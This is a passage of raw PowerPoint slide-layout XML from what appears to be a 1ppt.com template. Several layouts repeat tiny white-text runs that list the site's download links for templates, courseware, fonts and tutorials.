              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout150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50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50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50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5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51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51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51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51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51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51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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout151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51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51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51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5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52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52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52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52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52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52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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout152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52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52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52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5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53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53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53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53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53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53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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
